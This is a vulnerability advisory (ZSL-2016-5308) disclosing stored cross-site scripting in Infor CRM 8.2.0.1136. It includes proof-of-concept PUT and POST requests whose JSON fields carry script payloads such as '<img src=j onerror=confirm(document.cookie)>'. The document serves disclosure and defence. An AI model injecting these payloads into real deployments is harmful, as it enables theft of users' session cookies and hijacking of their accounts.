扫码分享
验证:
体验盒子|
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 97 98 99 100 101 102 103 104 105 106 107 108 109 110 111 112 113 114 115 116 117 118 119 120 121 122 123 124 125 126 127 128 129 130 131 132 133 134 135 136 137 138 139 140 141 142 143 144 145 146 147 148 149 150 151 152 153 154 155 156 157 158 159 160 161 162 163 164 165 166 167 168 169 170 171 172 173 174 175 176 |
Infor CRM 8.2.0.1136 Multiple HTML Script Injection Vulnerabilities Vendor: Infor Product web page: http://www.infor.com Affected version: 8.2.0.1136 Summary: Infor® CRM, formerly Saleslogix, is an award-winning customer relationship management (CRM) solution that provides a complete view of customer interactions, so your business can collaborate and respond promptly and knowledgably to customer inquiries, sales opportunities, and service requests. Infor CRM includes a robust suite of sales, marketing, and service capabilities, to offer businesses of all sizes a fast, flexible, and affordable solution for finding, winning, and growing profitable customer relationships. Desc: Infor CRM suffers from multiple stored cross-site scripting vulnerabilities. Input passed to several POST/PUT parameters in JSON format is not properly sanitised before being returned to the user. This can be exploited to execute arbitrary HTML and script code in a user's browser session in context of an affected site. Tested on: Microsoft-IIS/8.5 ASP.NET/4.0.30319 Vulnerability discovered by Gjoko 'LiquidWorm' Krstic @zeroscience Advisory ID: ZSL-2016-5308 Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2016-5308.php 21.01.2016 --- ---------------------------------- Affected parameter(s): description ---------------------------------- PUT /SLXClient/slxdata.ashx/slx/system/-/attachments(%22eUSERA0004IX%22)?_includeFile=false&format=json&_t=1456358980947 HTTP/1.1 Host: intranet.zeroscience.mk {$updated: "/Date(1456359095000)/", $key: "eUSERA0004IX",…} "": "" $descriptor: "" $etag: "+CgjMLB+0nA=" $httpStatus: 200 $key: "eUSERA0004IX" $lookup: "https://intranet.zeroscience.mk/SLXClient/slxdata.ashx/slx/system/-/attachments?format=json" $post: "https://intranet.zeroscience.mk/SLXClient/slxdata.ashx/slx/system/-/attachments?format=json" $schema: "https://intranet.zeroscience.mk/SLXClient/slxdata.ashx/slx/system/-/attachments/$schema?format=json" $service: "https://intranet.zeroscience.mk/SLXClient/slxdata.ashx/slx/system/-/attachments/$service?format=json" $template: "https://intranet.zeroscience.mk/SLXClient/slxdata.ashx/slx/system/-/attachments/$template?format=json" $updated: "/Date(1456359095000)/" $url: "https://intranet.zeroscience.mk/SLXClient/slxdata.ashx/slx/system/-/attachments('eUSERA0004IX')" accountId: null activityId: null attachDate: "2016-01-25T00:09:39Z" contactId: null contractId: null createDate: "/Date(1456359095000)/" createUser: "UUSERA0005W0" dataType: "R" defectId: null description: "<img src=j onerror=confirm(document.cookie) >" details: {createSource: null} documentType: null fileExists: true fileName: "inforcrm_xss.png" fileSize: 101722 historyId: null leadId: null modifyDate: "/Date(1456359095000)/" modifyUser: "UUSERA0005W0" opportunityId: null physicalFileName: "!eUSERA0004IXinforcrm_xss.png" productId: null remoteStatus: null returnId: null salesOrderId: null ticketId: null url: null user: {$key: "UUSERA0005W0"} ----------------------------------------------------------- Affected parameter(s): Description, Location, and LongNotes ----------------------------------------------------------- POST /SLXClient/slxdata.ashx/slx/system/-/activities?format=json&_t=1456357736977 HTTP/1.1 Host: intranet.zeroscience.mk {$httpStatus: 200, $descriptor: "", ActivityBasedOn: null, Alarm: false,…} $descriptor: "" $httpStatus: 200 AccountId: null AccountName: null ActivityAttendees: {} ActivityBasedOn: null Alarm: false AlarmTime: "2016-01-24T22:45:00Z" AllowAdd: true AllowComplete: true AllowDelete: true AllowEdit: true AllowSync: true AppId: null Attachment: false AttachmentCount: null AttendeeCount: 0 Category: "Pleasantville" ContactId: null ContactName: null CreateDate: "/Date(-62135596800000)/" CreateUser: null Description: "<img src=zsl onerror=prompt(1) >" Details: {ForeignId1: null, ForeignId2: null, ForeignId3: null, ForeignId4: null, ProjectId: null,…} ChangeKey: null CreateSource: null ForeignId1: null ForeignId2: null ForeignId3: null ForeignId4: null GlobalSyncId: null ProjectId: null Tick: null UserDef1: null UserDef2: null UserDef3: null Duration: "0" EndDate: "/Date(1456359315286)/" LeadId: null LeadName: null Leader: {$key: "UUSERA0005W0", $descriptor: "Userovich, User"} $descriptor: "Userovich, User" $key: "UUSERA0005W0" Location: "<img src=zsl onerror=prompt(2) >" LongNotes: "<img src=zsl onerror=prompt(3) >" ModifyDate: "/Date(-62135596800000)/" ModifyUser: null Notes: "Zero Science Lab" OpportunityId: null OpportunityName: null OriginalDate: "/Date(1456358415286)/" PhoneNumber: null Priority: "1" ProcessId: null ProcessNode: null RecurIterations: 0 RecurPeriod: 0 RecurPeriodSpec: 0 RecurSkip: null RecurrenceState: "rsNotRecurring" Recurring: false Resources: {} Rollover: false StartDate: "2016-01-25T00:00:05Z" TicketId: null TicketNumber: null Timeless: true Type: "atToDo" UserActivities: {} $url: "https://intranet.zeroscience.mk/SLXClient/slxdata.ashx/slx/system/-/userActivities?format=json&where=Activity.Id%20eq%20%27VUSERA000CZ7%27" UserNotifications: {} $url: "https://intranet.zeroscience.mk/SLXClient/slxdata.ashx/slx/system/-/userNotifications?format=json&where=Activity.Id%20eq%20%27VUSERA000CZ7%27" |
体验盒子
